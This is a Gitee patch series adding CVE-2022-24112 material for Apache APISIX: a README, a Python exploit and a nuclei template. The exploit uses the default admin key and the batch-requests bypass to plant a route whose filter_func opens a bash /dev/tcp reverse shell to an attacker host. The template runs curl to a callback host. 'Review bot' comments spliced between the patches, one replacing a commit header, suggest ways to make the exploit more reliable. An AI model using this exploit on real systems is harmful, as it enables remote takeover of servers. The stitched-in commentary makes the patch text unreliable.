From 68ff42c8822c8e09f8a4b6c6592face429f530f1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:49:39 +0000 Subject: [PATCH 01/13] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202022?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Apache-APISIX/2022/.keep diff --git a/cve/Apache-APISIX/2022/.keep b/cve/Apache-APISIX/2022/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 771a0d9ae01c6e85497644cf2d451dbc438f46ea Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:53:50 +0000 Subject: [PATCH 02/13] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20cve-2022-24112?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2022/cve-2022-24112/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Apache-APISIX/2022/cve-2022-24112/.keep diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/.keep b/cve/Apache-APISIX/2022/cve-2022-24112/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From c886d67b31c2e3034da311553f6039f09a9dee34 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:55:32 +0000 Subject: [PATCH 03/13] add CVE-2022-24112 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 严州扬 --- .../2022/cve-2022-24112/README.md | 21 +++++ .../2022/cve-2022-24112/apisix-exploit.py | 79 +++++++++++++++++++ 2 files changed, 100 insertions(+) create mode 100644 cve/Apache-APISIX/2022/cve-2022-24112/README.md create mode 100644 cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/README.md b/cve/Apache-APISIX/2022/cve-2022-24112/README.md new file mode 100644 index 00000000..c099b392 --- /dev/null 
+++ b/cve/Apache-APISIX/2022/cve-2022-24112/README.md
@@ -0,0 +1,21 @@
+# Apache APISIX Remote Code Execution (CVE-2022-24112) Exploit
+
+## Summary
+An attacker can abuse the batch-requests plugin to send requests to
+bypass the IP restriction of Admin API.
+A default configuration of Apache APISIX (with default API key) is
+vulnerable to remote code execution.
+When the admin key was changed or the port of Admin API was changed to
+a port different from the data panel, the impact is lower. But there
+is still a risk to bypass the IP restriction of Apache APISIX's data
+panel.
+
+There is a check in the batch-requests plugin which overrides the
+client IP with its real remote IP. But due to a bug in the code, this
+check can be bypassed.
+
+## Remediation
+upgrade to 2.10.4 or 2.12.1.
+
+
+
diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py b/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py
new file mode 100644
index 00000000..d8528165
--- /dev/null
+++ b/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py
@@ -0,0 +1,79 @@ +import requests +import sys + + +class color: + HEADER = '\033[95m' + IMPORTANT = '\33[35m' + NOTICE = '\033[33m' + OKBLUE = '\033[94m' + OKGREEN = '\033[92m' + WARNING = '\033[93m' + RED = '\033[91m' + END = '\033[0m' + UNDERLINE = '\033[4m' + LOGGING = '\33[34m' +color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING] + + +def banner(): + run = color_random[6]+'''\n . , + _.._ * __*\./ ___ _ \./._ | _ *-+- + (_][_)|_) |/'\ (/,/'\[_)|(_)| | + | | +\n''' + run2 = color_random[2]+'''\t\t(CVE-2022-24112)\n''' + run3 = color_random[4]+'''{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n''' + print(run+run2+run3) + +if (len(sys.argv) != 4): + banner() + print("[!] Usage : ./apisix-exploit.py ") + exit() + +else: + banner() + target_url = sys.argv[1] + lhost = sys.argv[2] + lport = sys.argv[3] + +headers1 = { + 'Host': '127.0.0.1:8080', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69', + 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', + 'Accept': '*/*', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/json', + 'Content-Length': '540', + 'Connection': 'close', +} + +headers2 = { + 'Host': '127.0.0.1:8080', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69', + 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', + 'Accept': '*/*', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/json', + 'Connection': 'close', +} + +json_data = { + 'headers': { + 'X-Real-IP': '127.0.0.1', + 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', + 'Content-Type': 'application/json', + }, + 'timeout': 1500, + 'pipeline': [ + { + 'path': '/apisix/admin/routes/index', + 'method': 'PUT', + 'body': 
'{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},"name":"wthtzv","filter_func":"function(vars) os.execute(\'bash -c \\\\\\"0<&160-;exec 160<>/dev/tcp/'+lhost+'/'+lport+';sh <&160 >&160 2>&160\\\\\\"\'); return true end"}', + }, + ], +} + +response1 = requests.post(target_url+'apisix/batch-requests', headers=headers1, json=json_data, verify=False) + +response2 = requests.get(target_url+'rms/fzxewh', headers=headers2, verify=False) -- Gitee From 81b6b58bfe124a55a19839a4e1d937ab6fc7733d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:55:40 +0000 Subject: [PATCH 04/13] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Apache-APISIX/2022/cve-2022-24112/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2022/cve-2022-24112/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Apache-APISIX/2022/cve-2022-24112/.keep diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/.keep b/cve/Apache-APISIX/2022/cve-2022-24112/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From a6d5d4d545244c7aff317516acf856aa6cb9c112 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:55:47 +0000 Subject: [PATCH 05/13] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Apache-APISIX/2022/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Apache-APISIX/2022/.keep diff --git a/cve/Apache-APISIX/2022/.keep b/cve/Apache-APISIX/2022/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From d4aa862f00939aca1c1967c9504089a92825add8 Mon Sep 17 00:00:00 2001 
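Review bot: Neither `response1` nor `response2` is ever inspected or printed, so the operator gets no indication whether the batch request created the route or whether the trigger GET reached it, and `headers1` carries a hard-coded `'Content-Length': '540'` that bears no relation to the body built from `lhost`/`lport` (requests computes the length of a `json=` body itself, so the entry is dead weight today and a mismatch waiting to happen if anyone switches to `data=`; dropping it also makes `headers1` identical to `headers2`). Success should be judged from the batch body as well as `response1.status_code`, since the batch endpoint very likely reports the nested admin PUT's result inside its JSON rather than through its own status. `target_url+'apisix/batch-requests'` silently breaks when the first argument lacks a trailing slash, and the implanted route `/rms/fzxewh` with its `filter_func` reverse shell persists on the target after the run, which a tester should remove (`DELETE /apisix/admin/routes/index` via the same batch channel) or at least be warned about. The usage string `"[!] Usage : ./apisix-exploit.py "` shows no argument placeholders (they may have been lost in rendering); it should read `"[!] Usage : ./apisix-exploit.py <target_url/> <lhost> <lport>"`.
```python
# … unchanged: banner, argv handling, headers1/headers2 (minus 'Content-Length'), json_data …
if not target_url.endswith('/'):
    target_url += '/'

response1 = requests.post(target_url+'apisix/batch-requests', headers=headers1, json=json_data, verify=False)
print("[*] batch-requests -> HTTP %d: %s" % (response1.status_code, response1.text[:300]))
if response1.status_code != 200:
    sys.exit("[!] route injection failed; check the admin key, admin port and that batch-requests is enabled")

response2 = requests.get(target_url+'rms/fzxewh', headers=headers2, verify=False)
print("[*] trigger -> HTTP %d (route /rms/fzxewh is left on the target; DELETE routes/index when done)" % response2.status_code)
```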
From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:56:25 +0000 Subject: [PATCH 06/13] add CVE-2022-24112 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 严州扬 --- cve/Apache-APISIX/2022/CVE-2022-24112.yaml | 54 ++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 cve/Apache-APISIX/2022/CVE-2022-24112.yaml diff --git a/cve/Apache-APISIX/2022/CVE-2022-24112.yaml b/cve/Apache-APISIX/2022/CVE-2022-24112.yaml new file mode 100644 index 00000000..a2d9ab83 --- /dev/null +++ b/cve/Apache-APISIX/2022/CVE-2022-24112.yaml 
@@ -0,0 +1,54 @@ +id: CVE-2022-24112 + +info: + name: Apache APISIX apisix/batch-requests RCE + description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. + author: Mr-xn + severity: critical + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 + - https://www.openwall.com/lists/oss-security/2022/02/11/3 + - https://twitter.com/sirifu4k1/status/1496043663704858625 + - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests + + tags: cve,cve2022,apache,rce,apisix + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2022-24112 + cwe-id: CWE-290 + +requests: + - raw: + - | + POST /apisix/batch-requests HTTP/1.1 + Host: {{Host}}:9080 + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Connection: close + + {"headers":{"X-Real-IP":"127.0.0.1","Content-Type":"application/json"},"timeout":1500,"pipeline":[{"method":"PUT","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1","body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/test\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{randstr}}.{{interactsh-url}}'); return true end\"}"}]} + - | + GET /api/test HTTP/1.1 + Host: {{Host}}:9080 + 
Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Connection: close + + redirects: false + + matchers-condition: and + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + # - "status_code_2 == 404" + - 'contains(body_1, "{{randstr}}")' + # - 'contains(body_1, "\"status\":200,\"reason\":\"OK\"}")' + condition: and + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" -- Gitee From b44053992e1450aa2b230b75568932093b1461db Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:56:49 +0000 Subject: [PATCH 07/13] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Apache-APISIX/2022/CVE-2022-24112.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2022/CVE-2022-24112.yaml | 54 ---------------------- 1 file changed, 54 deletions(-) delete mode 100644 cve/Apache-APISIX/2022/CVE-2022-24112.yaml diff --git a/cve/Apache-APISIX/2022/CVE-2022-24112.yaml b/cve/Apache-APISIX/2022/CVE-2022-24112.yaml deleted file mode 100644 index a2d9ab83..00000000 --- a/cve/Apache-APISIX/2022/CVE-2022-24112.yaml +++ /dev/null 
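Review bot: The nested `path` hard-codes the default admin key `api_key=edd1c9f034335f136f87ad84b625c8f1` and `Host: {{Host}}:9080` hard-codes the default data-plane port, so the template only fires against an install that still uses both defaults, while the `description` in this same hunk says the IP-restriction bypass remains after the key is changed. A no-match therefore must not be read as "not vulnerable", and `status_code_1 == 200` on its own says little, since the batch endpoint probably answers 200 even when the nested admin PUT is rejected; the `{{randstr}}` and interactsh matchers are what actually carry the detection. I would add `# NOTE: requires the default admin key and the Admin API reachable on the data-plane port (9080); a rotated key still leaves the batch-requests IP bypass, so a miss is not a clean bill of health` directly above `requests:`.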
@@ -1,54 +0,0 @@ -id: CVE-2022-24112 - -info: - name: Apache APISIX apisix/batch-requests RCE - description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. - author: Mr-xn - severity: critical - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 - - https://www.openwall.com/lists/oss-security/2022/02/11/3 - - https://twitter.com/sirifu4k1/status/1496043663704858625 - - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests - - tags: cve,cve2022,apache,rce,apisix - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2022-24112 - cwe-id: CWE-290 - -requests: - - raw: - - | - POST /apisix/batch-requests HTTP/1.1 - Host: {{Host}}:9080 - Content-Type: application/json - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - Connection: close - - {"headers":{"X-Real-IP":"127.0.0.1","Content-Type":"application/json"},"timeout":1500,"pipeline":[{"method":"PUT","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1","body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/test\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{randstr}}.{{interactsh-url}}'); return true end\"}"}]} - - | - GET /api/test HTTP/1.1 - Host: {{Host}}:9080 - 
Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - Connection: close - - redirects: false - - matchers-condition: and - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code_1 == 200" - # - "status_code_2 == 404" - - 'contains(body_1, "{{randstr}}")' - # - 'contains(body_1, "\"status\":200,\"reason\":\"OK\"}")' - condition: and - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" -- Gitee From 7c0ea6980e4a7854c56dba8579d0fe4304ea6344 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:56:56 +0000 Subject: [PATCH 08/13] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Apache-APISIX/2022/yaml/.keep diff --git a/cve/Apache-APISIX/2022/yaml/.keep b/cve/Apache-APISIX/2022/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 1c62fe32c7dbb8271ec73265f5543bfb99a9e2a8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:57:15 +0000 Subject: [PATCH 09/13] add CVE-2022-24112 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 严州扬 --- .../2022/yaml/CVE-2022-24112.yaml | 54 +++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml diff --git a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml new file mode 100644 index 00000000..a2d9ab83 --- /dev/null +++ b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml 
@@ -0,0 +1,54 @@ +id: CVE-2022-24112 + +info: + name: Apache APISIX apisix/batch-requests RCE + description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. + author: Mr-xn + severity: critical + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 + - https://www.openwall.com/lists/oss-security/2022/02/11/3 + - https://twitter.com/sirifu4k1/status/1496043663704858625 + - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests + + tags: cve,cve2022,apache,rce,apisix + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2022-24112 + cwe-id: CWE-290 + +requests: + - raw: + - | + POST /apisix/batch-requests HTTP/1.1 + Host: {{Host}}:9080 + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Connection: close + + {"headers":{"X-Real-IP":"127.0.0.1","Content-Type":"application/json"},"timeout":1500,"pipeline":[{"method":"PUT","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1","body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/test\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{randstr}}.{{interactsh-url}}'); return true end\"}"}]} + - | + GET /api/test HTTP/1.1 + Host: {{Host}}:9080 + 
Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Connection: close + + redirects: false + + matchers-condition: and + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + # - "status_code_2 == 404" + - 'contains(body_1, "{{randstr}}")' + # - 'contains(body_1, "\"status\":200,\"reason\":\"OK\"}")' + condition: and + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" -- Gitee From 7d0b97042078fa0b4ebd8435e9a0885c46ab0926 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 25 Mar 2023 14:57:21 +0000 Subject: [PATCH 10/13] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Apache-APISIX/2022/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Apache-APISIX/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Apache-APISIX/2022/yaml/.keep diff --git a/cve/Apache-APISIX/2022/yaml/.keep b/cve/Apache-APISIX/2022/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From a29879b5181196eb6bc64440975cda24f458b3d5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Fri, 7 Apr 2023 03:53:31 +0000 Subject: [PATCH 11/13] update cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 严州扬 --- .../2022/yaml/CVE-2022-24112.yaml | 46 +++---------------- 1 file changed, 6 insertions(+), 40 deletions(-) diff --git a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml index a2d9ab83..b40c0770 100644 --- a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml +++ b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml 
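Review bot: The nested `PUT /apisix/admin/routes/index` creates a real route `/api/test` whose `filter_func` runs `os.execute('curl ...')` on every hit, and nothing in the template removes it, so each positive scan leaves a command-execution route on the target for anyone who finds the path. A detection template should append a third request on the same batch channel that deletes the route after the callback check, and the `description` should warn operators about the artifact until it does. The commented-out `"status":200,"reason":"OK"` matcher suggests the nested result is reported inside the batch body, which is also where a cleanup's success would have to be verified rather than via `status_code_3`.
```yaml
    # … unchanged: first two raw requests (batch PUT, GET /api/test) …
      - |
        POST /apisix/batch-requests HTTP/1.1
        Host: {{Host}}:9080
        Content-Type: application/json
        Connection: close

        {"headers":{"X-Real-IP":"127.0.0.1"},"timeout":1500,"pipeline":[{"method":"DELETE","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1"}]}
```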
@@ -1,54 +1,20 @@ id: CVE-2022-24112 - +source: https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112 info: - name: Apache APISIX apisix/batch-requests RCE - description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. - author: Mr-xn + name: Apache APISIX APISIX/batch请求RCE severity: critical + description: Apache APISIX APISIX/batch requests插件允许将X-REAL-IP头重写为RCE;攻击者可以滥用批处理请求插件发送请求以绕过Admin API的IP限制。Apache APISIX的默认配置(带有默认API密钥)易受远程代码执行的攻击。当管理密钥被更改或管理API的端口被更改为不同于数据面板的端口时,影响较小。但绕过Apache APISIX数据面板的IP限制仍然存在风险。在批处理请求插件中有一个检查,它用实际的远程IP覆盖客户端IP。但由于代码中的一个错误,可以绕过此检查。 + reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 - https://www.openwall.com/lists/oss-security/2022/02/11/3 - https://twitter.com/sirifu4k1/status/1496043663704858625 - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests - tags: cve,cve2022,apache,rce,apisix + classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2022-24112 cwe-id: CWE-290 - -requests: - - raw: - - | - POST /apisix/batch-requests HTTP/1.1 - Host: {{Host}}:9080 - Content-Type: application/json - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - Connection: close - - 
{"headers":{"X-Real-IP":"127.0.0.1","Content-Type":"application/json"},"timeout":1500,"pipeline":[{"method":"PUT","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1","body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/test\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{randstr}}.{{interactsh-url}}'); return true end\"}"}]} - - | - GET /api/test HTTP/1.1 - Host: {{Host}}:9080 - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - Connection: close - - redirects: false - - matchers-condition: and - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code_1 == 200" - # - "status_code_2 == 404" - - 'contains(body_1, "{{randstr}}")' - # - 'contains(body_1, "\"status\":200,\"reason\":\"OK\"}")' - condition: and - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" + tags: cve2022 \ No newline at end of file -- Gitee From adc371cdf372728f53feb459a886961bfe13381c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 15 Apr 2023 13:01:49 +0000 Subject: [PATCH 12/13] update cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 严州扬 --- cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml index b40c0770..670cbd6f 100644 --- a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml +++ b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml 
@@ -4,17 +4,16 @@ info: name: Apache APISIX APISIX/batch请求RCE severity: critical description: Apache APISIX APISIX/batch requests插件允许将X-REAL-IP头重写为RCE;攻击者可以滥用批处理请求插件发送请求以绕过Admin API的IP限制。Apache APISIX的默认配置(带有默认API密钥)易受远程代码执行的攻击。当管理密钥被更改或管理API的端口被更改为不同于数据面板的端口时,影响较小。但绕过Apache APISIX数据面板的IP限制仍然存在风险。在批处理请求插件中有一个检查,它用实际的远程IP覆盖客户端IP。但由于代码中的一个错误,可以绕过此检查。 - reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 - https://www.openwall.com/lists/oss-security/2022/02/11/3 - https://twitter.com/sirifu4k1/status/1496043663704858625 - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests - - classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2022-24112 cwe-id: CWE-290 + cnvd-id: None + kve-id: None tags: cve2022 \ No newline at end of file -- Gitee From c0915af7cb9204716e27b6672872f927600b8948 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=A5=E5=B7=9E=E6=89=AC?= Date: Sat, 15 Apr 2023 13:02:29 +0000 Subject: [PATCH 13/13] update cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 严州扬 --- cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml index 670cbd6f..883d103f 100644 --- a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml +++ b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml 
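Review bot: `cnvd-id: None` and `kve-id: None` are parsed by YAML as the literal string `"None"`, not as a null, so any consumer that tests for an absent identifier will see a non-empty value. Use `cnvd-id: null` and `kve-id: null` (or `~`), or omit the keys entirely when there is no identifier to record. The hunk also deletes the blank lines before `reference:` and `classification:`, which is harmless.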
@@ -1,7 +1,7 @@ id: CVE-2022-24112 source: https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112 info: - name: Apache APISIX APISIX/batch请求RCE + name: Apache APISIX Dashboard 是 Apache APISIX 网关的可视化管理界面 severity: critical description: Apache APISIX APISIX/batch requests插件允许将X-REAL-IP头重写为RCE;攻击者可以滥用批处理请求插件发送请求以绕过Admin API的IP限制。Apache APISIX的默认配置(带有默认API密钥)易受远程代码执行的攻击。当管理密钥被更改或管理API的端口被更改为不同于数据面板的端口时,影响较小。但绕过Apache APISIX数据面板的IP限制仍然存在风险。在批处理请求插件中有一个检查,它用实际的远程IP覆盖客户端IP。但由于代码中的一个错误,可以绕过此检查。 reference: -- Gitee
